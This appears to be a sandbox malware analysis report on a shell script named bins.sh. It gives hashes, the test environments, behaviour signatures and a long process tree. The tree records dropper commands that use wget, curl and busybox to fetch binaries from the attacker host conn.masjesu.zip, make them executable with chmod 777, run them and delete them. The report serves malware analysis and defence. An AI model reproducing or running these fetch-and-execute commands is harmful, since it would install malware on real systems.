Analysis

max time kernel: 416s
max time network: 419s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 16/12/2024, 04:16
Static task
static1

Behavioral tasks (sample: bins.sh in every task)
behavioral1: debian12-armhf-20240221-en
behavioral2: debian12-mipsel-20240221-en
behavioral3: debian9-armhf-20240611-en
behavioral4: debian9-mipsbe-20240611-en
behavioral5: debian9-mipsel-20240729-en
behavioral6: ubuntu1804-amd64-20240611-en
behavioral7: ubuntu2404-amd64-20240523-en
General

Target: bins.sh
Size: 10KB
MD5: 7c06e835a83b81914ba9a19c15e66d76
SHA1: bc618204890c0b179a00d6d253001a6e27197aa1
SHA256: cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
SHA512: 4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
SSDEEP: 192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config

Signatures

File and Directory Permissions Modification (1 TTP, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE (28 IoCs)
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl; the report lists this same entry once for every curl process in the tree below)
System Network Configuration Discovery (1 TTP, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory (27 IoCs)
Malware often drops required files in the /tmp directory.
Processes

Each entry gives the PID, the image path, the command line, and in brackets the signatures the sandbox attached to that process; indentation shows parent/child depth (every child below is spawned directly by bins.sh).

PID 703   /tmp/bins.sh: /tmp/bins.sh
  PID 710   /bin/rm: /bin/rm bins.sh

  PID 712   /usr/bin/wget: wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [System Network Configuration Discovery]
  PID 723   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 735   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [System Network Configuration Discovery]
  PID 736   /bin/chmod: chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [File and Directory Permissions Modification]
  PID 737   /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA: ./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [Executes dropped EXE]
  PID 738   /bin/rm: rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

  PID 739   /usr/bin/wget: wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [System Network Configuration Discovery]
  PID 740   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 742   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [System Network Configuration Discovery]
  PID 743   /bin/chmod: chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [File and Directory Permissions Modification]
  PID 744   /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX: ./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [Executes dropped EXE]
  PID 745   /bin/rm: rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

  PID 746   /usr/bin/wget: wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
  PID 747   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 755   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [System Network Configuration Discovery]
  PID 758   /bin/chmod: chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [File and Directory Permissions Modification]
  PID 760   /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht: ./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [Executes dropped EXE]
  PID 763   /bin/rm: rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

  PID 764   /usr/bin/wget: wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
  PID 771   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 780   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [System Network Configuration Discovery]
  PID 785   /bin/chmod: chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [File and Directory Permissions Modification]
  PID 786   /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO: ./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [Executes dropped EXE]
  PID 789   /bin/rm: rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

  PID 791   /usr/bin/wget: wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [System Network Configuration Discovery]
  PID 801   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 808   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [System Network Configuration Discovery]
  PID 809   /bin/chmod: chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [File and Directory Permissions Modification]
  PID 810   /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O: ./lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [Executes dropped EXE]
  PID 811   /bin/rm: rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O

  PID 812   /usr/bin/wget: wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [System Network Configuration Discovery]
  PID 813   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [Reads runtime system information; Writes file to tmp directory]
  PID 818   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
  PID 819   /bin/chmod: chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [File and Directory Permissions Modification]
  PID 820   /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj: ./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [Executes dropped EXE]
  PID 821   /bin/rm: rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

  PID 822   /usr/bin/wget: wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [System Network Configuration Discovery]
  PID 823   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 827   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
  PID 830   /bin/chmod: chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [File and Directory Permissions Modification]
  PID 831   /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p: ./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [Executes dropped EXE]
  PID 834   /bin/rm: rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

  PID 835   /usr/bin/wget: wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [System Network Configuration Discovery]
  PID 842   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 852   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [System Network Configuration Discovery]
  PID 856   /bin/chmod: chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [File and Directory Permissions Modification]
  PID 857   /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf: ./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [Executes dropped EXE]
  PID 860   /bin/rm: rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

  PID 862   /usr/bin/wget: wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [System Network Configuration Discovery]
  PID 867   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [Reads runtime system information; Writes file to tmp directory]
  PID 869   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [System Network Configuration Discovery]
  PID 870   /bin/chmod: chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [File and Directory Permissions Modification]
  PID 871   /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE: ./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [Executes dropped EXE]
  PID 872   /bin/rm: rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

  PID 873   /usr/bin/wget: wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [System Network Configuration Discovery]
  PID 874   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [Reads runtime system information; Writes file to tmp directory]
  PID 876   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
  PID 877   /bin/chmod: chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [File and Directory Permissions Modification]
  PID 878   /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J: ./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [Executes dropped EXE]
  PID 879   /bin/rm: rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

  PID 880   /usr/bin/wget: wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
  PID 881   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 883   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
  PID 884   /bin/chmod: chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [File and Directory Permissions Modification]
  PID 885   /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8: ./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [Executes dropped EXE]
  PID 886   /bin/rm: rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

  PID 887   /usr/bin/wget: wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [System Network Configuration Discovery]
  PID 888   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 890   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [System Network Configuration Discovery]
  PID 891   /bin/chmod: chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [File and Directory Permissions Modification]
  PID 892   /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ: ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [Executes dropped EXE]
  PID 893   /bin/rm: rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

  PID 894   /usr/bin/wget: wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [System Network Configuration Discovery]
  PID 895   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 897   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [System Network Configuration Discovery]
  PID 898   /bin/chmod: chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [File and Directory Permissions Modification]
  PID 899   /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen: ./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [Executes dropped EXE]
  PID 900   /bin/rm: rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

  PID 901   /usr/bin/wget: wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [System Network Configuration Discovery]
  PID 902   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 904   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
  PID 905   /bin/chmod: chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [File and Directory Permissions Modification]
  PID 906   /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ: ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [Executes dropped EXE]
  PID 907   /bin/rm: rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

  PID 908   /usr/bin/wget: wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [System Network Configuration Discovery]
  PID 909   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [Reads runtime system information; Writes file to tmp directory]
  PID 911   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [System Network Configuration Discovery]
  PID 912   /bin/chmod: chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [File and Directory Permissions Modification]
  PID 913   /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J: ./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J  [Executes dropped EXE]
  PID 914   /bin/rm: rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

  PID 915   /usr/bin/wget: wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [System Network Configuration Discovery]
  PID 916   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [Reads runtime system information; System Network Configuration Discovery]
  PID 919   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [System Network Configuration Discovery]
  PID 920   /bin/chmod: chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [File and Directory Permissions Modification]
  PID 921   /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8: ./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8  [Executes dropped EXE]
  PID 922   /bin/rm: rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

  PID 923   /usr/bin/wget: wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
  PID 924   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 926   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [System Network Configuration Discovery]
  PID 927   /bin/chmod: chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [File and Directory Permissions Modification]
  PID 928   /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE: ./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE  [Executes dropped EXE]
  PID 929   /bin/rm: rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

  PID 930   /usr/bin/wget: wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [System Network Configuration Discovery]
  PID 931   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 933   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [System Network Configuration Discovery]
  PID 934   /bin/chmod: chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [File and Directory Permissions Modification]
  PID 935   /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen: ./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen  [Executes dropped EXE]
  PID 936   /bin/rm: rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

  PID 937   /usr/bin/wget: wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
  PID 938   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 940   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [System Network Configuration Discovery]
  PID 941   /bin/chmod: chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [File and Directory Permissions Modification]
  PID 942   /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ: ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ  [Executes dropped EXE]
  PID 943   /bin/rm: rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

  PID 944   /usr/bin/wget: wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [System Network Configuration Discovery]
  PID 945   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 947   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [System Network Configuration Discovery]
  PID 948   /bin/chmod: chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [File and Directory Permissions Modification]
  PID 949   /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ: ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ  [Executes dropped EXE]
  PID 950   /bin/rm: rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

  PID 951   /usr/bin/wget: wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
  PID 952   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 954   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [System Network Configuration Discovery]
  PID 955   /bin/chmod: chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [File and Directory Permissions Modification]
  PID 956   /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX: ./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  [Executes dropped EXE]
  PID 957   /bin/rm: rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

  PID 958   /usr/bin/wget: wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [System Network Configuration Discovery]
  PID 959   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 961   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [System Network Configuration Discovery]
  PID 962   /bin/chmod: chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [File and Directory Permissions Modification]
  PID 963   /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht: ./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht  [Executes dropped EXE]
  PID 964   /bin/rm: rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

  PID 965   /usr/bin/wget: wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
  PID 966   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [Reads runtime system information; Writes file to tmp directory]
  PID 968   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [System Network Configuration Discovery]
  PID 969   /bin/chmod: chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [File and Directory Permissions Modification]
  PID 970   /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO: ./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO  [Executes dropped EXE]
  PID 971   /bin/rm: rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

  PID 972   /usr/bin/wget: wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [System Network Configuration Discovery]
  PID 973   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 975   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [System Network Configuration Discovery]
  PID 976   /bin/chmod: chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [File and Directory Permissions Modification]
  PID 977   /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA: ./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  [Executes dropped EXE]
  PID 978   /bin/rm: rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

  PID 979   /usr/bin/wget: wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [System Network Configuration Discovery]
  PID 980   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [Reads runtime system information; Writes file to tmp directory]
  PID 982   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [System Network Configuration Discovery]
  PID 983   /bin/chmod: chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [File and Directory Permissions Modification]
  PID 984   /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj: ./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj  [Executes dropped EXE]
  PID 985   /bin/rm: rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

  PID 986   /usr/bin/wget: wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [System Network Configuration Discovery]
  PID 987   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 989   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
  PID 990   /bin/chmod: chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [File and Directory Permissions Modification]
  PID 991   /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p: ./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p  [Executes dropped EXE]
  PID 992   /bin/rm: rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

  PID 993   /usr/bin/wget: wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [System Network Configuration Discovery]
  PID 994   /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [Reads runtime system information; Writes file to tmp directory]
  PID 996   /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [System Network Configuration Discovery]
  PID 997   /bin/chmod: chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [File and Directory Permissions Modification]
  PID 998   /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf: ./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf  [Executes dropped EXE]
  PID 999   /bin/rm: rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

  PID 1000  /usr/bin/wget: wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [System Network Configuration Discovery]
  PID 1001  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 1003  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [System Network Configuration Discovery]
  PID 1004  /bin/chmod: chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [File and Directory Permissions Modification]
  PID 1005  /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O: ./lAKMISeUV2PhSu0DN3bVycJibusAQif91O  [Executes dropped EXE]
  PID 1006  /bin/rm: rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97